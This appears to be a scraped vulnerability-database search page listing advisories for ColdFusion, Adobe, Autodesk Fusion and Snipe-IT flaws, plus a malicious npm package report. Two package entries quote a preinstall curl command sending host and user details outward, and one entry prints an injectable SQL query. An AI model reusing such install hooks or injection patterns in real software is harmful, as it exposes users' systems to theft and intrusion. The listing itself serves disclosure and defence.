Lucene search
K

1789 matches found

NVD
NVD
added yesterday6 views

CVE-2026-34099

Guardian language-system passes the id GET parameter directly into an unsanitized SQL query in jobinfo.php line 16: SELECT FROM jobs where id = '".$GET'id'."'. No authentication is required. An unauthenticated attacker can perform error-based SQL injection to extract the database version, current...

9.8CVSS
Exploits0References2
EUVD
EUVD
added yesterday5 views

EUVD-2026-41056

Guardian language-system passes the id GET parameter directly into an unsanitized SQL query in jobinfo.php line 16: SELECT FROM jobs where id = '".$GET'id'."'. No authentication is required. An unauthenticated attacker can perform error-based SQL injection to extract the database version, current...

9.8CVSS5.8AI score
Exploits0References2
NVD
NVD
added 2 days ago6 views

CVE-2026-48281

ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed...

10CVSS0.00855EPSS
Exploits0References1
Cvelist
Cvelist
added 2 days ago31 views

CVE-2026-48315 ColdFusion | Improper Input Validation (CWE-20)

ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gainin...

9.3CVSS0.00548EPSS
Exploits0References1
CVE
CVE
added 2 days ago10 views

CVE-2026-48286

Adobe Campaign Classic (ACC) versions 7.4.3 build 9396 and earlier are affected by an Incorrect Authorization vulnerability (CWE-863) that could permit arbitrary code execution in the context of the current user. Exploitation does not require user interaction, and the impact is limited to the use...

10CVSS6.4AI score0.00712EPSS
Exploits0References1Affected Software1
Positive Technologies
Positive Technologies
added 2026/06/23 12:0 a.m.8 views

PT-2026-51642

Name of the Vulnerable Software and Affected Versions Snipe-IT affected versions not specified Description An authorization bypass exists in the BulkAssetsController::update function. The system accepts the company id variable directly from user input without utilizing the standard company-scopin...

6.3CVSS5.9AI score
Exploits0References5
EUVD
EUVD
added 2026/06/22 5:15 p.m.6 views

EUVD-2026-38328

A maliciously crafted webpage, when visited by a user with Autodesk Fusion Desktop running and the MCP extension enabled, can trigger a vulnerability in the MCP extension that could allow arbitrary code execution. A successful exploit may allow code to execute with the privileges of the current...

9.6CVSS6.2AI score0.00381EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/06/22 12:0 a.m.13 views

PT-2026-51360

Name of the Vulnerable Software and Affected Versions Autodesk Fusion Desktop affected versions not specified Description A flaw in the MCP extension allows arbitrary code execution when a user visits a maliciously crafted webpage while the software is running and the extension is enabled. A...

9.6CVSS6.4AI score0.00381EPSS
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 10:5 a.m.7 views

Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

5.4AI score
Exploits0References1
OSV
OSV
added 2026/06/15 10:5 a.m.6 views

MAL-2026-5836 Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

5.4AI score
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/10 9:2 p.m.8 views

CVE-2026-47931

ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed...

9.9CVSS6.2AI score0.00555EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/10 9:0 p.m.12 views

CVE-2026-34701

InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file...

7.8CVSS6.2AI score0.00175EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/10 9:0 p.m.12 views

CVE-2026-34695

InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file...

7.8CVSS6.2AI score0.00175EPSS
Exploits0References1
CVE
CVE
added 2026/06/09 8:59 p.m.32 views

CVE-2026-48303

Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by an Incorrect Authorization vulnerability (CWE-863) that could allow arbitrary code execution in the context of the current user. Exploitation does not require user interaction; the CVSS 3.1 vector is AV:N/AC:L/PR:N...

10CVSS6.2AI score0.00553EPSS
Exploits0References1Affected Software1
Vulnrichment
Vulnrichment
added 2026/06/09 8:33 p.m.8 views

CVE-2026-47929 ColdFusion | Incorrect Authorization (CWE-863)

ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. A high-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim...

8.4CVSS6.2AI score0.07535EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/09 8:5 p.m.44 views

CVE-2026-47937 Acrobat Reader | Uncontrolled Search Path Element (CWE-427)

Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. An attacker with high privileges could exploit this vulnerability to execute arbitrary...

7.7CVSS0.00151EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/09 8:1 p.m.38 views

CVE-2026-47919 Acrobat Reader | Use After Free (CWE-416)

Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file...

7.8CVSS0.00257EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/06/09 12:0 a.m.15 views

PT-2026-48271

Name of the Vulnerable Software and Affected Versions ColdFusion versions 2023.19 through 2025.8 ColdFusion versions prior to 2025.8 Description Improper input validation allows for arbitrary code execution in the context of the current user. This issue can be exploited without requiring any user...

9.9CVSS6AI score0.00555EPSS
Exploits0References6
Positive Technologies
Positive Technologies
added 2026/06/09 12:0 a.m.23 views

PT-2026-48269

Name of the Vulnerable Software and Affected Versions ColdFusion versions 2023.19 and earlier ColdFusion versions 2025.8 and earlier Description An incorrect authorization flaw allows a high-privileged attacker to achieve arbitrary code execution in the context of the current user. This issue...

9.1CVSS6AI score0.07535EPSS
Exploits0References3
CNNVD
CNNVD
added 2026/06/09 12:0 a.m.15 views

Adobe Acrobat Reader 代码问题漏洞

Adobe Acrobat Reader is a PDF viewer developed by Adobe Inc. in the United States. This software is used for printing, signing, and annotating PDF documents. Versions of Adobe Acrobat Reader such as 24.001.30365, 26.001.21651, and earlier versions have code vulnerabilities. These vulnerabilities...

7.7CVSS5.7AI score0.00151EPSS
Exploits0References1
Rows per page
Query Builder